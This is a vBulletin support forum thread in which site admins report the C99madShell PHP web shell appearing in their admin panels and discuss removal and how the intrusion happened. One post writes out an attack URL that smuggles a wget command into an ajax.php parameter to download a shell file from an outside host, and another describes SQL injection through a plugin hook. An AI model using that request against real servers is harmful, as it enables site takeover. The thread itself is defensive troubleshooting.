![]() |
|
|
Thread Tools |
|
#1
|
|||
|
|||
|
C99madShell v. 2.0 madnet edition
I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....
--------------- Added 21 Jan 2009 at 03:08 --------------- Ok... it was going back to the init.php file, and told me this line ($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false; I commented that line out (//) and it went away.... --------------- Added 21 Jan 2009 at 03:23 --------------- solved.... error.php No members have liked this post.
Last edited by ryan.gottlieb : 21 Jan 2009 at 03:23. Reason: Auto-Merged DoublePost |
|
#2
|
||||
|
||||
|
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.
__________________
View My Modifications 29 Releases and Counting... Latest Modification: dmActivityStream - vBookie Integration (4.x) Please do not PM me to ask for support - please use the relevant thread or forum. No members have liked this post.
|
|
#3
|
|||
|
|||
|
No, by SOLVED I meant I removed the script.. (The shell script)
No members have liked this post.
|
|
#4
|
||||
|
||||
|
That still does not solve how the attacker got the file there. Unless you know that already too?
__________________
View My Modifications 29 Releases and Counting... Latest Modification: dmActivityStream - vBookie Integration (4.x) Please do not PM me to ask for support - please use the relevant thread or forum. No members have liked this post.
|
|
#5
|
|||
|
|||
|
am having this problem as well.....When I try to edit the payments manager I get the above msg
!C99madShell v. 2.0 madnet edition! Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13 No members have liked this post.
|
|
#6
|
|||
|
|||
|
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.
No members have liked this post.
|
|
#7
|
|||
|
|||
|
Um, it's not a Trojan :P
http://www.derekfountain.org/security_c99madshell.php You've encountered the first evidence that your site has been compromised! Cheers! No members have liked this post.
|
|
#8
|
||||
|
||||
|
Originally Posted by Crad
Tomato, Tomato or Potato, Potato it does not matter, it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter and tbo I have no clue why you even posted that last snippet of quick whit, nothing to cheer about until you've removed it
.
__________________
Search - Some often wonder why many do not reply to their posts... has the same question been answered before? *Use the search feature. Information - Posting for help or asking a question? *Include screenshots, copied/pasted code or errors, url. Fixed - Please return to your thread/post and disclose how you resolved the issue! *Helpful for those with a similar issue in the future i.e. possibly a solution! Thanks - Thanks for your participation on vbulletin.org! ♥ No members have liked this post.
|
|
#9
|
||||
|
||||
|
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt
Then they process this from here. I would recommend vbulletin upgrading / securing the ajax.php asap No members have liked this post.
Last edited by daydie : 24 Aug 2011 at 19:32. |
|
#10
|
|||
|
|||
|
Originally Posted by Crad
A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if i use the word "Trojan".
But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data? No members have liked this post.
|
|
#11
|
|||
|
|||
|
Right now i have the exactly same problem. Does anyone know how to solve this problem please ? I am running my own dedicated server but since am not good with server management, i do not have any idea about what to do on server side if it's not about a file removing or something like that...
No members have liked this post.
|
|
#12
|
||||
|
||||
|
I saw this for the first time on a client's install two or so months ago. None of the vBulletin files were modified and the database was clean so I was stumped at first. It turns out this particular exploit uses vB's plugin/hook system; if you see a strange plugin (note I said plugin, not product), remove it. Then, find out how it got on there. xD
Just read a document on this exploit; bad file permission or upload script setups could allow something like this to happen. No members have liked this post.
|
|
#13
|
|||
|
|||
|
I think Shell is malicious
![]() No members have liked this post.
|
|
#14
|
||||
|
||||
|
Originally Posted by daydie
You cannot upload files like that with ajax.php unless someone has already compromised you.
What actually happens is they use sql injection via an unsafe modification to install a plugin on the ajax hook, then use that malicious plugin to install the file. If you forum directory was properly secured as read only (to apache) then that wget would fail to actually save the file.
__________________
Cable Forum - DigiGuide Please Note: I will not answer support questions via e-mail or PM - please use the relevant thread or forum. Senior vBulletin Developer : Please do not PM me about custom work - I work for Internet brands and no longer have the time to undertake any. No members have liked this post.
|
![]() |
«
Previous Thread
|
Next Thread
»
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| PM Preview 3.5 Edition | BluPhoenix | vBulletin 3.5 Add-ons | 92 | 30 May 2010 07:34 |
| Let me google that for you - AME Edition | Vitaly | vBulletin 3.7 Add-ons | 6 | 08 Feb 2009 11:13 |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) |
| Thread Tools | |
|
|
| New To Site? | Need Help? |
All times are GMT. The time now is 20:07.



.


